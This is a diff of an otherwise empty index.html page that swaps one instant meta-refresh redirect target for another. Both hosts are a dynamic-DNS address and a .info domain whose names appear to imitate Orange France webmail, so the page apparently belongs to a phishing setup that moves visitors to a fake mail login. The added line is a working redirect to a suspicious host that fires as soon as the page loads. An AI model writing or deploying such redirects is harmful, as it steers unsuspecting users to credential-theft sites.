--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <HTML>
 <HEAD>
 <TITLE></TITLE>
-<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://franfrmailidss.ddns.net/v3/pro/"></HEAD>
+<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://mailorangefrv3.info"></HEAD>
 <BODY>
 
 <BR><BR>
